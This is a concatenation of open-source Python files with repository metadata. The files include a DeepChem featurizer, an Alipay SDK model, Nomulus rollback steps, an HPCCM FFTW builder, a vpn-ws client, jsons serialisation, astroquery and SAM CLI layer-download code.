10.1103/PhysRevB.93.085142
.. [3] Matminer: Ward, L. et al. Comput. Mater. Sci. 152, 60-69 (2018).
.. [4] Pymatgen: Ong, S.P. et al. Comput. Mater. Sci. 68, 314-319 (2013).
Examples
--------
>>> import deepchem as dc
>>> import pymatgen as mg
>>> comp = mg.core.Composition("Fe2O3")
>>> featurizer = dc.feat.ElementPropertyFingerprint()
>>> features = featurizer.featurize([comp])
>>> type(features[0])
<class 'numpy.ndarray'>
>>> features[0].shape
(65,)
Note
----
This class requires matminer and Pymatgen to be installed.
`NaN` feature values are automatically converted to 0 by this featurizer.
"""
def __init__(self, data_source: str = 'matminer'):
"""
Parameters
----------
data_source: str of "matminer", "magpie" or "deml" (default "matminer")
Source for element property data.
"""
self.data_source = data_source
self.ep_featurizer: Any = None
def _featurize(self, datapoint: PymatgenComposition,
**kwargs) -> np.ndarray:
"""
Calculate chemical fingerprint from crystal composition.
Parameters
----------
datapoint: pymatgen.core.Composition object
Composition object.
Returns
-------
feats: np.ndarray
Vector of properties and statistics derived from chemical
stoichiometry. Some values may be NaN.
"""
if 'composition' in kwargs and datapoint is None:
datapoint = kwargs.get("composition")
raise DeprecationWarning(
'Composition is being phased out as a parameter, please pass "datapoint" instead.'
)
if self.ep_featurizer is None:
try:
from matminer.featurizers.composition import ElementProperty
self.ep_featurizer = ElementProperty.from_preset(
self.data_source)
except ModuleNotFoundError:
raise ImportError(
"This class requires matminer to be installed.")
try:
feats = self.ep_featurizer.featurize(datapoint)
        except Exception:
            # Featurization can fail for unusual compositions; fall back to an
            # empty feature vector rather than letting the exception propagate.
            feats = []
return np.nan_to_num(np.array(feats))
|
07b3d7c50572b518c1cac1970163cadb4125c630
|
5a52ccea88f90dd4f1acc2819997fce0dd5ffb7d
|
/alipay/aop/api/domain/AntProdpaasArrangementCommonQueryModel.py
|
972cb67e8154c75a9e978bc94efbff4d0bf72f96
|
[
"Apache-2.0"
] |
permissive
|
alipay/alipay-sdk-python-all
|
8bd20882852ffeb70a6e929038bf88ff1d1eff1c
|
1fad300587c9e7e099747305ba9077d4cd7afde9
|
refs/heads/master
| 2023-08-27T21:35:01.778771
| 2023-08-23T07:12:26
| 2023-08-23T07:12:26
| 133,338,689
| 247
| 70
|
Apache-2.0
| 2023-04-25T04:54:02
| 2018-05-14T09:40:54
|
Python
|
UTF-8
|
Python
| false
| false
| 4,658
|
py
|
AntProdpaasArrangementCommonQueryModel.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
from alipay.aop.api.domain.ArrangementBaseSelector import ArrangementBaseSelector
from alipay.aop.api.domain.ArrangementConditionGroupSelector import ArrangementConditionGroupSelector
from alipay.aop.api.domain.ArrangementInvolvedPartyQuerier import ArrangementInvolvedPartyQuerier
from alipay.aop.api.domain.ArrangementNoQuerier import ArrangementNoQuerier
class AntProdpaasArrangementCommonQueryModel(object):
def __init__(self):
self._arrangement_base_selector = None
self._arrangement_condition_group_selector = None
self._arrangement_involved_party_querier = None
self._arrangement_no_querier = None
@property
def arrangement_base_selector(self):
return self._arrangement_base_selector
@arrangement_base_selector.setter
def arrangement_base_selector(self, value):
if isinstance(value, ArrangementBaseSelector):
self._arrangement_base_selector = value
else:
self._arrangement_base_selector = ArrangementBaseSelector.from_alipay_dict(value)
@property
def arrangement_condition_group_selector(self):
return self._arrangement_condition_group_selector
@arrangement_condition_group_selector.setter
def arrangement_condition_group_selector(self, value):
if isinstance(value, ArrangementConditionGroupSelector):
self._arrangement_condition_group_selector = value
else:
self._arrangement_condition_group_selector = ArrangementConditionGroupSelector.from_alipay_dict(value)
@property
def arrangement_involved_party_querier(self):
return self._arrangement_involved_party_querier
@arrangement_involved_party_querier.setter
def arrangement_involved_party_querier(self, value):
if isinstance(value, ArrangementInvolvedPartyQuerier):
self._arrangement_involved_party_querier = value
else:
self._arrangement_involved_party_querier = ArrangementInvolvedPartyQuerier.from_alipay_dict(value)
@property
def arrangement_no_querier(self):
return self._arrangement_no_querier
@arrangement_no_querier.setter
def arrangement_no_querier(self, value):
if isinstance(value, ArrangementNoQuerier):
self._arrangement_no_querier = value
else:
self._arrangement_no_querier = ArrangementNoQuerier.from_alipay_dict(value)
def to_alipay_dict(self):
params = dict()
if self.arrangement_base_selector:
if hasattr(self.arrangement_base_selector, 'to_alipay_dict'):
params['arrangement_base_selector'] = self.arrangement_base_selector.to_alipay_dict()
else:
params['arrangement_base_selector'] = self.arrangement_base_selector
if self.arrangement_condition_group_selector:
if hasattr(self.arrangement_condition_group_selector, 'to_alipay_dict'):
params['arrangement_condition_group_selector'] = self.arrangement_condition_group_selector.to_alipay_dict()
else:
params['arrangement_condition_group_selector'] = self.arrangement_condition_group_selector
if self.arrangement_involved_party_querier:
if hasattr(self.arrangement_involved_party_querier, 'to_alipay_dict'):
params['arrangement_involved_party_querier'] = self.arrangement_involved_party_querier.to_alipay_dict()
else:
params['arrangement_involved_party_querier'] = self.arrangement_involved_party_querier
if self.arrangement_no_querier:
if hasattr(self.arrangement_no_querier, 'to_alipay_dict'):
params['arrangement_no_querier'] = self.arrangement_no_querier.to_alipay_dict()
else:
params['arrangement_no_querier'] = self.arrangement_no_querier
return params
@staticmethod
def from_alipay_dict(d):
if not d:
return None
o = AntProdpaasArrangementCommonQueryModel()
if 'arrangement_base_selector' in d:
o.arrangement_base_selector = d['arrangement_base_selector']
if 'arrangement_condition_group_selector' in d:
o.arrangement_condition_group_selector = d['arrangement_condition_group_selector']
if 'arrangement_involved_party_querier' in d:
o.arrangement_involved_party_querier = d['arrangement_involved_party_querier']
if 'arrangement_no_querier' in d:
o.arrangement_no_querier = d['arrangement_no_querier']
return o
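# --- Usage sketch (illustrative; not part of the Alipay SDK) ---
# Demonstrates the dict round trip the model supports. The nested querier
# payload is a hypothetical example; real field names come from the
# corresponding ArrangementNoQuerier definition.
if __name__ == "__main__":
    model = AntProdpaasArrangementCommonQueryModel.from_alipay_dict(
        {"arrangement_no_querier": {"ar_no": "2021010100000001"}}
    )
    print(json.dumps(model.to_alipay_dict(), default=str))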
|
58358e7250015934d7c168ad728d5a4b0dc1393a
|
adebaf6fa8518bb8119b4edd6e8dbb319f79e947
|
/release/rollback/steps.py
|
5068109f4656ac226b1db894583416614da7e484
|
[
"Apache-2.0",
"LicenseRef-scancode-free-unknown"
] |
permissive
|
google/nomulus
|
a482d1e15dd7e9f0faedea404c3137385a1633f7
|
7b59c4abbff56f37a0cf0bf0467e0f520b2056a5
|
refs/heads/master
| 2023-08-27T10:51:26.301885
| 2023-08-25T20:30:37
| 2023-08-25T20:30:37
| 52,821,506
| 1,785
| 324
|
Apache-2.0
| 2023-09-14T20:53:52
| 2016-02-29T20:16:48
|
Java
|
UTF-8
|
Python
| false
| false
| 6,997
|
py
|
steps.py
|
# Copyright 2020 The Nomulus Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Definition of rollback steps and factory methods to create them."""
import dataclasses
import subprocess
import textwrap
from typing import Tuple
import appengine
import common
@dataclasses.dataclass(frozen=True)
class RollbackStep:
"""One rollback step.
Most steps are implemented using commandline tools, e.g., gcloud and
gsutil, and execute their commands by forking a subprocess. Each step
    also has an info method that returns its command with a description.
    Two steps are handled differently: the _UpdateDeployTag step pipes its
    payload through a shell command, and the
_SetManualScalingNumInstances step uses the AppEngine Admin API client in
this package to set the number of instances.
"""
description: str
command: Tuple[str, ...]
def info(self) -> str:
return f'# {self.description}\n' f'{" ".join(self.command)}'
def execute(self) -> None:
"""Executes the step.
Raises:
CannotRollbackError if command fails.
"""
if subprocess.call(self.command) != 0:
raise common.CannotRollbackError(f'Failed: {self.description}')
def check_schema_compatibility(dev_project: str, nom_tag: str,
sql_tag: str) -> RollbackStep:
return RollbackStep(description='Check compatibility with SQL schema.',
command=(f'{common.get_nomulus_root()}/nom_build',
':integration:sqlIntegrationTest',
f'--schema_version={sql_tag}',
f'--nomulus_version={nom_tag}',
'--publish_repo='
f'gcs://{dev_project}-deployed-tags/maven'))
@dataclasses.dataclass(frozen=True)
class _SetManualScalingNumInstances(RollbackStep):
"""Sets the number of instances for a manual scaling version.
The Nomulus set_num_instances command is currently broken. This step uses
the AppEngine REST API to update the version.
"""
appengine_admin: appengine.AppEngineAdmin
version: common.VersionKey
num_instance: int
def execute(self) -> None:
self.appengine_admin.set_manual_scaling_num_instance(
self.version.service_id, self.version.version_id,
self.num_instance)
def set_manual_scaling_instances(appengine_admin: appengine.AppEngineAdmin,
version: common.VersionConfig,
num_instances: int) -> RollbackStep:
cmd_description = textwrap.dedent("""\
Nomulus set_num_instances command is currently broken.
This script uses the AppEngine REST API to update the version.
To set this value without using this tool, you may use the REST API at
https://cloud.google.com/appengine/docs/admin-api/reference/rest/v1beta/apps.services.versions/patch
""")
return _SetManualScalingNumInstances(
        f'Set number of instances for manual-scaling version '
f'{version.version_id} in {version.service_id} to {num_instances}.',
(cmd_description, ''), appengine_admin, version, num_instances)
def start_or_stop_version(project: str, action: str,
version: common.VersionKey) -> RollbackStep:
"""Creates a rollback step that starts or stops an AppEngine version.
Args:
project: The GCP project of the AppEngine application.
action: Start or Stop.
version: The version being managed.
"""
return RollbackStep(
f'{action.title()} {version.version_id} in {version.service_id}',
('gcloud', 'app', 'versions', action, version.version_id, '--quiet',
'--service', version.service_id, '--project', project))
def direct_service_traffic_to_version(
project: str, version: common.VersionKey) -> RollbackStep:
return RollbackStep(
f'Direct all traffic to {version.version_id} in {version.service_id}.',
('gcloud', 'app', 'services', 'set-traffic', version.service_id,
'--quiet', f'--splits={version.version_id}=1', '--project', project))
@dataclasses.dataclass(frozen=True)
class KillNomulusInstance(RollbackStep):
"""Step that kills a Nomulus VM instance."""
instance_name: str
# yapf: disable
def kill_nomulus_instance(project: str,
version: common.VersionKey,
instance_name: str) -> KillNomulusInstance:
# yapf: enable
return KillNomulusInstance(
'Delete one VM instance.',
('gcloud', 'app', 'instances', 'delete', instance_name, '--quiet',
'--user-output-enabled=false', '--service', version.service_id,
'--version', version.version_id, '--project', project), instance_name)
@dataclasses.dataclass(frozen=True)
class _UpdateDeployTag(RollbackStep):
"""Updates the deployment tag on GCS."""
nom_tag: str
destination: str
def execute(self) -> None:
with subprocess.Popen(('gsutil', 'cp', '-', self.destination),
stdin=subprocess.PIPE) as p:
try:
p.communicate(self.nom_tag.encode('utf-8'))
if p.wait() != 0:
raise common.CannotRollbackError(
f'Failed: {self.description}')
except:
p.kill()
raise
def update_deploy_tags(dev_project: str, env: str,
nom_tag: str) -> RollbackStep:
destination = f'gs://{dev_project}-deployed-tags/nomulus.{env}.tag'
return _UpdateDeployTag(
f'Update Nomulus tag in {env}',
(f'echo {nom_tag} | gsutil cp - {destination}', ''), nom_tag,
destination)
def sync_live_release(dev_project: str, nom_tag: str) -> RollbackStep:
"""Syncs the target release artifacts to the live folder.
By convention the gs://{dev_project}-deploy/live folder should contain the
artifacts from the currently serving release.
For Domain Registry team members, this step updates the nomulus tool
installed on corp desktops.
"""
artifacts_folder = f'gs://{dev_project}-deploy/{nom_tag}'
live_folder = f'gs://{dev_project}-deploy/live'
return RollbackStep(
f'Syncing {artifacts_folder} to {live_folder}.',
('gsutil', '-m', 'rsync', '-d', artifacts_folder, live_folder))
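# --- Usage sketch (illustrative only; not part of the rollback tool) ---
# Shows the RollbackStep contract: info() previews the command, execute()
# forks it. The project and version identifiers are made up, and the
# VersionKey(service_id, version_id) constructor order is an assumption.
if __name__ == '__main__':
    step = direct_service_traffic_to_version(
        'example-project', common.VersionKey('default', 'nomulus-v123'))
    print(step.info())
    # step.execute()  # would actually invoke gcloud; intentionally not run here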
|
c89161ba84913cc6d8ab5d8e8a9b71aa1e613d1d
|
c140ad38b1463024e289ceb0d5d6d44a45c91724
|
/hpccm/building_blocks/fftw.py
|
8b733c206da6799165fb61d86a377e1f25886af1
|
[
"Apache-2.0"
] |
permissive
|
NVIDIA/hpc-container-maker
|
3a333526decbd18352ef8d1fb3bec0033be221e8
|
60fd2a51c171258a6b3f93c2523101cb7018ba1b
|
refs/heads/master
| 2023-08-21T13:32:27.132476
| 2023-06-12T21:12:40
| 2023-06-12T21:12:40
| 126,385,168
| 419
| 88
|
Apache-2.0
| 2023-09-11T18:33:26
| 2018-03-22T19:26:41
|
Python
|
UTF-8
|
Python
| false
| false
| 7,929
|
py
|
fftw.py
|
# Copyright (c) 2018, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# pylint: disable=invalid-name, too-few-public-methods
# pylint: disable=too-many-instance-attributes
"""FFTW building block"""
from __future__ import absolute_import
from __future__ import unicode_literals
from __future__ import print_function
import posixpath
import hpccm.config
import hpccm.templates.envvars
import hpccm.templates.ldconfig
from hpccm.building_blocks.base import bb_base
from hpccm.building_blocks.generic_autotools import generic_autotools
from hpccm.building_blocks.packages import packages
from hpccm.common import cpu_arch
from hpccm.primitives.comment import comment
class fftw(bb_base, hpccm.templates.envvars, hpccm.templates.ldconfig):
"""The `fftw` building block downloads, configures, builds, and
installs the [FFTW](http://www.fftw.org) component. Depending on
the parameters, the source will be downloaded from the web
(default) or copied from a source directory in the local build
context.
# Parameters
annotate: Boolean flag to specify whether to include annotations
(labels). The default is False.
check: Boolean flag to specify whether the `make check` step
should be performed. The default is False.
configure_opts: List of options to pass to `configure`. For
x86_64 processors, the default values are `--enable-shared`,
`--enable-openmp`, `--enable-threads`, and `--enable-sse2`. For
other processors, the default values are `--enable-shared`,
`--enable-openmp`, and `--enable-threads`.
directory: Path to the unpackaged source directory relative to the
local build context. The default value is empty. If this is
defined, the source in the local build context will be used rather
than downloading the source from the web.
disable_FEATURE: Flags to control disabling features when
configuring. For instance, `disable_foo=True` maps to
`--disable-foo`. Underscores in the parameter name are converted
to dashes.
enable_FEATURE[=ARG]: Flags to control enabling features when
configuring. For instance, `enable_foo=True` maps to
`--enable-foo` and `enable_foo='yes'` maps to `--enable-foo=yes`.
Underscores in the parameter name are converted to dashes.
environment: Boolean flag to specify whether the environment
(`LD_LIBRARY_PATH`) should be modified to include FFTW. The
default is True.
ldconfig: Boolean flag to specify whether the FFTW library
    directory should be added to the dynamic linker cache. If False, then
`LD_LIBRARY_PATH` is modified to include the FFTW library
directory. The default value is False.
mpi: Boolean flag to specify whether to build with MPI support
enabled. The default is False.
ospackages: List of OS packages to install prior to configuring
and building. The default values are `file`, `make`, and `wget`.
prefix: The top level install location. The default value is
`/usr/local/fftw`.
toolchain: The toolchain object. This should be used if
non-default compilers or other toolchain options are needed. The
default is empty.
version: The version of FFTW source to download. This value is
ignored if `directory` is set. The default value is `3.3.10`.
with_PACKAGE[=ARG]: Flags to control optional packages when
configuring. For instance, `with_foo=True` maps to `--with-foo`
and `with_foo='/usr/local/foo'` maps to
`--with-foo=/usr/local/foo`. Underscores in the parameter name
are converted to dashes.
without_PACKAGE: Flags to control optional packages when
configuring. For instance `without_foo=True` maps to
`--without-foo`. Underscores in the parameter name are converted
to dashes.
# Examples
```python
fftw(prefix='/opt/fftw/3.3.7', version='3.3.7')
```
```python
fftw(directory='sources/fftw-3.3.7')
```
```python
n = nvhpc(eula=True)
fftw(toolchain=n.toolchain)
```
```python
fftw(check=True, configure_opts=['--enable-shared', '--enable-threads',
'--enable-sse2', '--enable-avx'])
```
"""
def __init__(self, **kwargs):
"""Initialize building block"""
super(fftw, self).__init__(**kwargs)
self.__baseurl = kwargs.pop('baseurl', 'ftp://ftp.fftw.org/pub/fftw')
self.__check = kwargs.pop('check', False)
self.__configure_opts = kwargs.pop('configure_opts', [])
self.__directory = kwargs.pop('directory', '')
self.__mpi = kwargs.pop('mpi', False)
self.__ospackages = kwargs.pop('ospackages', ['file', 'make', 'wget'])
self.__prefix = kwargs.pop('prefix', '/usr/local/fftw')
self.__version = kwargs.pop('version', '3.3.10')
# Set the configure options
self.__configure()
# Set the environment variables
if not self.ldconfig:
self.environment_variables['LD_LIBRARY_PATH'] = '{}:$LD_LIBRARY_PATH'.format(posixpath.join(self.__prefix, 'lib'))
# Setup build configuration
self.__bb = generic_autotools(
annotations={'version': self.__version},
base_annotation=self.__class__.__name__,
check=self.__check,
configure_opts=self.__configure_opts,
comment=False,
devel_environment=self.environment_variables,
# PGI compiler needs a larger stack size
postconfigure=['ulimit -s unlimited'] if self.__check else None,
prefix=self.__prefix,
runtime_environment=self.environment_variables,
url='{0}/fftw-{1}.tar.gz'.format(self.__baseurl, self.__version),
**kwargs)
# Container instructions
self += comment('FFTW version {}'.format(self.__version))
self += packages(ospackages=self.__ospackages)
self += self.__bb
def __configure(self):
"""Setup configure options based on user parameters and CPU
architecture"""
if hpccm.config.g_cpu_arch == cpu_arch.X86_64:
if not self.__configure_opts:
self.__configure_opts = ['--enable-shared', '--enable-openmp',
'--enable-threads', '--enable-sse2']
if hpccm.config.test_cpu_feature_flag('avx'):
self.__configure_opts.append('--enable-avx')
if hpccm.config.test_cpu_feature_flag('avx2'):
self.__configure_opts.append('--enable-avx2')
if hpccm.config.test_cpu_feature_flag('avx512'):
self.__configure_opts.append('--enable-avx512')
else:
if not self.__configure_opts:
self.__configure_opts = ['--enable-shared', '--enable-openmp',
'--enable-threads']
if self.__mpi:
self.__configure_opts.append('--enable-mpi')
def runtime(self, _from='0'):
"""Generate the set of instructions to install the runtime specific
components from a build in a previous stage.
# Examples
```python
f = fftw(...)
Stage0 += f
Stage1 += f.runtime()
```
"""
self.rt += comment('FFTW')
self.rt += self.__bb.runtime(_from=_from)
return str(self.rt)
|
610b2a203911684ccee85589f44753fdc6f1190f
|
2150466ca493d7659d8e65ca4498a4e4e88c0854
|
/clients/vpn_linux_tornado.py
|
5d003e65d410674eef9af32a6a89e41d80635961
|
[
"MIT"
] |
permissive
|
unbit/vpn-ws
|
43ce0287d869611a1a6ab354f38ad59aeab456b2
|
f57aaf73164de3abd85955e74ff41a962d9fe185
|
refs/heads/master
| 2023-06-08T06:22:40.245353
| 2023-04-03T04:36:17
| 2023-04-03T04:36:17
| 26,267,188
| 494
| 120
|
MIT
| 2023-04-03T04:36:18
| 2014-11-06T11:32:35
|
C
|
UTF-8
|
Python
| false
| false
| 617
|
py
|
vpn_linux_tornado.py
|
from tornado import ioloop
from ws4py.client.tornadoclient import TornadoWebSocketClient
from pytun import TunTapDevice, IFF_TAP, IFF_NO_PI
import sys
io_loop = ioloop.IOLoop.instance()
tap = TunTapDevice(flags=IFF_TAP|IFF_NO_PI, name='vpn-ws%d')
class VpnWSClient(TornadoWebSocketClient):
def received_message(self, m):
tap.write(str(m))
def closed(self, code, reason=None):
print "ooops"
ws = VpnWSClient(sys.argv[1])
ws.connect()
def tap_callback(fd, event):
ws.send(tap.read(tap.mtu), binary=True)
io_loop.add_handler(tap.fileno(), tap_callback, io_loop.READ)
io_loop.start()
|
e8a72528f56e1f8d2ab2dbe115a49632f5687349
|
474c281c47aed69036b2a13e9a60d150d8ecddc5
|
/jsons/_dump_impl.py
|
c37165774d49b83a8e17676682d636d5909cf13c
|
[
"MIT"
] |
permissive
|
ramonhagenaars/jsons
|
c2445eb7c002544abdfde4ac63d42f5a93e4d776
|
9abbf3a3bd32435ac74bc98c3554ad3c71086036
|
refs/heads/master
| 2023-07-23T22:08:10.093119
| 2022-06-09T19:50:52
| 2022-06-09T19:50:52
| 140,337,655
| 286
| 52
|
MIT
| 2023-07-14T15:20:59
| 2018-07-09T20:18:08
|
Python
|
UTF-8
|
Python
| false
| false
| 3,997
|
py
|
_dump_impl.py
|
"""
PRIVATE MODULE: do not import (from) it directly.
This module contains functionality for dumping stuff to json.
"""
import json
from typing import Optional, Dict
from jsons._cache import clear
from jsons._common_impl import StateHolder
from jsons._extra_impl import announce_class
from jsons._lizers_impl import get_serializer
from jsons.exceptions import SerializationError
def dump(obj: object,
cls: Optional[type] = None,
*,
strict: bool = False,
fork_inst: Optional[type] = StateHolder,
**kwargs) -> object:
"""
Serialize the given ``obj`` to a JSON equivalent type (e.g. dict, list,
int, ...).
The way objects are serialized can be finetuned by setting serializer
functions for the specific type using ``set_serializer``.
You can also provide ``cls`` to specify that ``obj`` needs to be serialized
as if it was of type ``cls`` (meaning to only take into account attributes
from ``cls``). The type ``cls`` must have a ``__slots__`` defined. Any type
will do, but in most cases you may want ``cls`` to be a base class of
``obj``.
:param obj: a Python instance of any sort.
    :param cls: if given, ``obj`` will be dumped as if it is of type ``cls``.
:param strict: a bool to determine if the serializer should be strict
(i.e. only dumping stuff that is known to ``cls``).
:param fork_inst: if given, it uses this fork of ``JsonSerializable``.
:param kwargs: the keyword args are passed on to the serializer function.
:return: the serialized obj as a JSON type.
"""
cls_ = cls or obj.__class__
serializer = get_serializer(cls_, fork_inst)
# Is this the initial call or a nested?
initial = kwargs.get('_initial', True)
kwargs_ = {
'fork_inst': fork_inst,
'_initial': False,
'strict': strict,
**kwargs
}
announce_class(cls_, fork_inst=fork_inst)
return _do_dump(obj, serializer, cls, initial, kwargs_)
def _do_dump(obj, serializer, cls, initial, kwargs):
try:
result = serializer(obj, cls=cls, **kwargs)
if initial:
clear()
return result
except Exception as err:
clear()
raise SerializationError(str(err)) from err
def dumps(obj: object,
jdkwargs: Optional[Dict[str, object]] = None,
*args,
**kwargs) -> str:
"""
Extend ``json.dumps``, allowing any Python instance to be dumped to a
string. Any extra (keyword) arguments are passed on to ``json.dumps``.
:param obj: the object that is to be dumped to a string.
:param jdkwargs: extra keyword arguments for ``json.dumps`` (not
``jsons.dumps``!)
:param args: extra arguments for ``jsons.dumps``.
    :param kwargs: Keyword arguments that are passed on through the
    serialization process and on to the serializer function.
:return: ``obj`` as a ``str``.
"""
jdkwargs = jdkwargs or {}
dumped = dump(obj, *args, **kwargs)
return json.dumps(dumped, **jdkwargs)
def dumpb(obj: object,
encoding: str = 'utf-8',
jdkwargs: Optional[Dict[str, object]] = None,
*args,
**kwargs) -> bytes:
"""
Extend ``json.dumps``, allowing any Python instance to be dumped to bytes.
Any extra (keyword) arguments are passed on to ``json.dumps``.
:param obj: the object that is to be dumped to bytes.
:param encoding: the encoding that is used to transform to bytes.
:param jdkwargs: extra keyword arguments for ``json.dumps`` (not
``jsons.dumps``!)
:param args: extra arguments for ``jsons.dumps``.
    :param kwargs: Keyword arguments that are passed on through the
    serialization process and on to the serializer function.
:return: ``obj`` as ``bytes``.
"""
jdkwargs = jdkwargs or {}
dumped_dict = dump(obj, *args, **kwargs)
dumped_str = json.dumps(dumped_dict, **jdkwargs)
return dumped_str.encode(encoding=encoding)
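# --- Usage sketch (illustrative; not part of this private module) ---
# The public ``jsons`` package registers the default serializers that these
# functions look up, so ``jsons.dump``/``jsons.dumps`` are the supported
# entry points. The ``User`` dataclass is a made-up example.
if __name__ == '__main__':
    from dataclasses import dataclass

    import jsons

    @dataclass
    class User:
        name: str
        age: int

    print(jsons.dump(User(name='Ada', age=36)))   # e.g. {'age': 36, 'name': 'Ada'}
    print(jsons.dumps(User(name='Ada', age=36)))  # the same payload as a JSON string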
|
d79f7f770e2968fa9fe0f430cb47f6bd7884e654
|
d88458a65a173999df390117005fa813735e5fe2
|
/astroquery/utils/tap/model/shared_to_item.py
|
f30876b280dc385c760710e6cafd4b08bcc95c84
|
[] |
permissive
|
astropy/astroquery
|
9a2793826229ba4b41ec3607ca77832036a534e9
|
51316d7417d7daf01a8b29d1df99037b9227c2bc
|
refs/heads/main
| 2023-09-01T20:52:41.625935
| 2023-08-29T23:22:40
| 2023-08-29T23:22:40
| 4,787,269
| 636
| 365
|
BSD-3-Clause
| 2023-09-14T21:56:33
| 2012-06-25T20:52:07
|
Python
|
UTF-8
|
Python
| false
| false
| 719
|
py
|
shared_to_item.py
|
# Licensed under a 3-clause BSD style license - see LICENSE.rst
"""
=============
TAP plus
=============
@author: Javier Duran
@contact: javier.duran@sciops.esa.int
European Space Astronomy Centre (ESAC)
European Space Agency (ESA)
Created on 28 sep. 2018
"""
class TapSharedToItem:
"""TAP shared to item object
"""
def __init__(self, attrs):
"""Constructor
"""
self.__attributes = attrs
self.id = attrs.getValue("shareTo")
self.type = attrs.getValue("shareType")
self.mode = attrs.getValue("shareMode")
def __str__(self):
return f"Shared to item: {self.id}" \
f"\n\tType: {self.type}" \
f"\n\tMode: {self.mode}"
|
0eae673c108a4a13f7ab3cb5284d86d9698337bb
|
e2d31e3754624eeb0a2dace8691c5c25ed3b988e
|
/generate_gmake2_vulkan.py
|
f6a3fbfabead915e0bbf9465aeb49a2594bde651
|
[
"MIT"
] |
permissive
|
PanosK92/SpartanEngine
|
da7950d3e5a673b3fd7881c6e9370d84c8e361a1
|
9cf38d84c344dad43a2cb45f018914f7504f1047
|
refs/heads/master
| 2023-09-01T09:01:47.784814
| 2023-08-24T09:42:53
| 2023-08-24T09:42:53
| 61,415,047
| 1,655
| 169
|
MIT
| 2023-09-11T15:08:52
| 2016-06-18T03:27:49
|
C++
|
UTF-8
|
Python
| false
| false
| 262
|
py
|
generate_gmake2_vulkan.py
|
import os
import subprocess
import sys
# change working directory to script directory
os.chdir(os.path.dirname(__file__))
# run script
subprocess.Popen("python3 build_scripts/generate_project_files.py gmake2 vulkan", shell=True).communicate()
# exit
sys.exit(0)
|
1151146929c813d7d0881b19e41a92ebd008353b
|
10cb11f83e1c8b51b9d72c28d6259a56ff1a97c8
|
/samcli/local/layers/layer_downloader.py
|
a600a032fe10aa524f0464b256298f39c35c96c3
|
[
"Apache-2.0",
"BSD-3-Clause",
"MIT",
"BSD-2-Clause"
] |
permissive
|
aws/aws-sam-cli
|
6d4411aacf7f861e75e5cf4882a32858797a276d
|
b297ff015f2b69d7c74059c2d42ece1c29ea73ee
|
refs/heads/develop
| 2023-08-30T23:28:36.179932
| 2023-08-30T21:58:26
| 2023-08-30T21:58:26
| 92,205,085
| 1,402
| 470
|
Apache-2.0
| 2023-09-14T21:14:23
| 2017-05-23T18:16:23
|
Python
|
UTF-8
|
Python
| false
| false
| 5,967
|
py
|
layer_downloader.py
|
"""
Downloads Layers locally
"""
import logging
from pathlib import Path
from typing import List
import boto3
from botocore.exceptions import ClientError, NoCredentialsError
from samcli.commands.local.cli_common.user_exceptions import CredentialsRequired, ResourceNotFound
from samcli.lib.providers.provider import LayerVersion, Stack
from samcli.lib.utils.codeuri import resolve_code_path
from samcli.local.lambdafn.remote_files import unzip_from_uri
LOG = logging.getLogger(__name__)
class LayerDownloader:
def __init__(self, layer_cache, cwd, stacks: List[Stack], lambda_client=None):
"""
Parameters
----------
layer_cache str
path where to cache layers
cwd str
Current working directory
stacks List[Stack]
List of all stacks
lambda_client boto3.client('lambda')
Boto3 Client for AWS Lambda
"""
self._layer_cache = layer_cache
self.cwd = cwd
self._stacks = stacks
self._lambda_client = lambda_client
@property
def lambda_client(self):
self._lambda_client = self._lambda_client or boto3.client("lambda")
return self._lambda_client
@property
def layer_cache(self):
"""
Layer Cache property. This will always return a cache that exists on the system.
Returns
-------
str
Path to the Layer Cache
"""
self._create_cache(self._layer_cache)
return self._layer_cache
def download_all(self, layers, force=False):
"""
Download a list of layers to the cache
Parameters
----------
layers list(samcli.commands.local.lib.provider.Layer)
List of Layers representing the layer to be downloaded
force bool
True to download the layer even if it exists already on the system
Returns
-------
List(Path)
List of Paths to where the layer was cached
"""
layer_dirs = []
for layer in layers:
layer_dirs.append(self.download(layer, force))
return layer_dirs
def download(self, layer: LayerVersion, force=False) -> LayerVersion:
"""
Download a given layer to the local cache.
Parameters
----------
layer samcli.commands.local.lib.provider.Layer
Layer representing the layer to be downloaded.
force bool
True to download the layer even if it exists already on the system
Returns
-------
Path
Path object that represents where the layer is download to
"""
if layer.is_defined_within_template:
LOG.info("%s is a local Layer in the template", layer.name)
layer.codeuri = resolve_code_path(self.cwd, layer.codeuri)
return layer
layer_path = Path(self.layer_cache).resolve().joinpath(layer.name)
is_layer_downloaded = self._is_layer_cached(layer_path)
layer.codeuri = str(layer_path)
if is_layer_downloaded and not force:
LOG.info("%s is already cached. Skipping download", layer.arn)
return layer
layer_zip_path = layer.codeuri + ".zip"
layer_zip_uri = self._fetch_layer_uri(layer)
unzip_from_uri(
layer_zip_uri,
layer_zip_path,
unzip_output_dir=layer.codeuri,
progressbar_label="Downloading {}".format(layer.layer_arn),
)
return layer
def _fetch_layer_uri(self, layer):
"""
Fetch the Layer Uri based on the LayerVersion Arn
Parameters
----------
layer samcli.commands.local.lib.provider.LayerVersion
LayerVersion to fetch
Returns
-------
str
The Uri to download the LayerVersion Content from
Raises
------
        samcli.commands.local.cli_common.user_exceptions.CredentialsRequired
            When the credentials given are not sufficient to call AWS Lambda
"""
try:
layer_version_response = self.lambda_client.get_layer_version(
LayerName=layer.layer_arn, VersionNumber=layer.version
)
except NoCredentialsError as ex:
raise CredentialsRequired("Layers require credentials to download the layers locally.") from ex
except ClientError as e:
error_code = e.response.get("Error").get("Code")
error_exc = {
"AccessDeniedException": CredentialsRequired(
"Credentials provided are missing lambda:Getlayerversion policy that is needed to download the "
"layer or you do not have permission to download the layer"
),
"ResourceNotFoundException": ResourceNotFound("{} was not found.".format(layer.arn)),
}
if error_code in error_exc:
raise error_exc[error_code]
